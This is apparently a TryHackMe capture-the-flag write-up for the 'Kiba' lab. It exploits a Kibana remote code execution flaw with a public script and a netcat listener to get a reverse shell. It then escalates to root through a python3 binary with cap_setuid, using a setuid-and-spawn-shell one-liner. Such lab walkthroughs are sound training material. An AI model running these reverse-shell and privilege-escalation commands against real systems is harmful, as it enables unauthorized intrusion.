Kiba
THM writeup for exploiting Kibana RCE
Target Details
Target IP: 10.10.252.150
Scan Target
Run Usual Nmap scan command
$ nmap -sCV -Pn -oN nmap.txt 10.10.252.150
$ cat nmap.txt
Nmap scan report for 10.10.252.150
Host is up (0.39s latency).
Not shown: 998 closed tcp ports (conn-refused)
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 7.2p2 Ubuntu 4ubuntu2.8 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 2048 9df8d157132481b6185d048ed2384f90 (RSA)
| 256 e1e67aa1a11cbe03d24e271b0d0aecb1 (ECDSA)
|_ 256 2abae5c5fb51381745e7b154caa1a3fc (ED25519)
80/tcp open http Apache httpd 2.4.18 ((Ubuntu))
| http-methods:
|_ Supported Methods: GET HEAD POST OPTIONS
|_http-server-header: Apache/2.4.18 (Ubuntu)
|_http-title: Site doesn't have a title (text/html).
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
Read data files from: /opt/homebrew/bin/../share/nmap
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
# Nmap done at Sat Apr 15 12:19:16 2023 -- 1 IP address (1 host up) scanned in 114.46 seconds
Nmap didn't captured other open ports. since we know the room is related to kibana, we can search for it kibana port. After quick search, We can find that kibana runs on port: 5601
Hosted Services Summary
22
Open SSH service
80
Apache Web Server
5601
Kibana
Navigating Kibana
Visit Kibana Dashboard hosted on http://10.10.252.150:5601

We're logged in as default user. and Management tab seems interesting.
Navigate to management tab

Searching for Kibana Vulnerabilities and Exploits
Search for kibana exploits on your favorite search engine
Found vulnerability with RCE details hosted on tenable.

On Reading Analysis we find that P{REDACTED} P{REDACTION} vulnerability was exploited to gain reverse shell.
Exploiting Kibana RCE Vuln
Exploit Script link can also be found on the tenable page.
Clone Github repo
To use the script with python3 change
content.data
->content.data.decode('utf-8')
Start netcat listener to catch Reverse Shell.
nc -nlvp 1234
Run exploit
./CVE-XXXX-XXXX-kibana-rce.py -u http://10.10.252.150:5601 -host [YOUR_THM_IP] -p 1234 --shell
Now, we've successfully received reverse shell on our machine
$ nc -nlvp 1234
Connection from 10.10.252.150:34696
bash: cannot set terminal process group (942): Inappropriate ioctl for device
bash: no job control in this shell
To run a command as administrator (user "root"), use "sudo <command>".
See "man sudo_root" for details.
kiba@ubuntu:/home/kiba/kibana/bin$
Capturing Flags
Get user.txt flag
kiba@ubuntu:/home/kiba/kibana/bin$ cd ~
kiba@ubuntu:/home/kiba$ ls
elasticsearch-6.5.4.deb kibana user.txt
kiba@ubuntu:/home/kiba$ cat user.txt
cat user.txt
THM{REDACTED}
kiba@ubuntu:/home/kiba$
On quickly searching for how to get capabilities list ubuntu. I found the useful command. Execute on captured shell.
$ getcap -r /
/home/kiba/.hackmeplease/python3 = cap_setuid+ep
/usr/bin/mtr = cap_net_raw+ep
/usr/bin/traceroute6.iputils = cap_net_raw+ep
/usr/bin/systemd-detect-virt = cap_dac_override,cap_sys_ptrace+ep
.hackmeplease
is providing us hint that we need to usepython3
binary. On researching cap_setuid+ep permission allows to set uid.If we set uid to 0 using python they we'll be able to run python commands and spawn a shell. python
os
module can be used to set uid.
/home/kiba/.hackmeplease/python3 -c "import os,pty; os.setuid(0); pty.spawn('/bin/bash');"
Read root flag
root@ubuntu# cat /root/root.txt
THM{REDACTED}
Last updated
Was this helpful?